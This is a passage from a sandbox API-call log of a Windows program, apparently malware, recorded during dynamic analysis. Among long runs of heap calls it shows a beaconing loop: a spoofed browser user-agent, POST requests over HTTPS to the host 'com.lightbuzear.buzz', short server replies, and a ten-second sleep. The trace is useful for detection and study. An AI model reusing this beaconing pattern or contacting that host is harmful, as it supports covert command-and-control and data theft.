Flags=0x0, Size=0x4) returned 0x47ce570 [0222.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0222.312] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0222.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0222.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0222.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0222.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e80 [0222.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0222.313] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0222.313] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830f48 [0222.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0222.314] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0222.314] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0222.314] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0222.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830f48 | out: hHeap=0x4780000) returned 1 [0222.315] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0222.315] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0222.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0222.315] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0222.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0222.315] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0222.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0222.315] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0222.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0222.315] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0222.315] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0222.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0222.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830ed0 [0222.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0222.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ed0 | out: hHeap=0x4780000) returned 1 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830f48 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0222.316] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ea8 [0222.316] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0222.317] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0222.317] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0222.317] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0223.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ea8 | out: hHeap=0x4780000) returned 1 [0223.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0223.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0223.572] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eda8 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830ea8 [0223.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0223.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0223.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ea8 | out: hHeap=0x4780000) returned 1 [0223.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ea8 [0223.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0223.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0223.595] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0223.595] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0223.595] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0223.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0223.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0223.596] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0223.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0223.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0223.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0223.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0223.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0223.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0223.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0223.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eda8 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830ed0 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ed0 | out: hHeap=0x4780000) returned 1 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ed0 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0223.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0223.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0223.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0223.598] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0223.598] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0223.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0223.598] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0223.599] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0223.599] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0223.599] FreeLibrary (hLibModule=0x71570000) returned 1 [0223.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0223.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0223.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0223.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0223.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c28 | out: hHeap=0x4780000) returned 1 [0223.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a98 | out: hHeap=0x4780000) returned 1 [0223.600] Sleep (dwMilliseconds=0x2710) [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0223.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0223.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0223.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0223.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0223.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0223.610] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0223.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0223.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0223.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0223.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ebb0 [0223.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0223.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0223.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0223.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c28 [0223.611] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eda8 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830cf0 [0223.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0223.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0223.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0223.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a98 [0223.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0223.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0223.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0223.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0223.613] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0223.613] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0223.614] FreeLibrary (hLibModule=0x71780000) returned 1 [0223.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0223.614] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0223.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0223.614] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0223.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0223.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0223.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0223.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0223.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0223.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0223.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0223.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0223.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0223.615] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0223.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0223.615] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0223.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0223.615] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0223.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0223.615] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0b48 [0223.615] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0223.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0223.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0223.615] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0223.615] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0223.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4708 [0223.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830f20 [0223.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830f20 | out: hHeap=0x4780000) returned 1 [0223.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0223.617] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0223.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0223.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0223.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0223.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0223.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0223.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0223.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0223.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0223.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0223.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815500 [0223.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0223.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815500 | out: hHeap=0x4780000) returned 1 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0223.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830f20 [0223.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0223.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830f20 | out: hHeap=0x4780000) returned 1 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830f20 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0223.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482fff8 [0223.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0223.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0223.619] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0223.619] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0223.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482fff8 | out: hHeap=0x4780000) returned 1 [0223.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0223.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0223.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0223.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 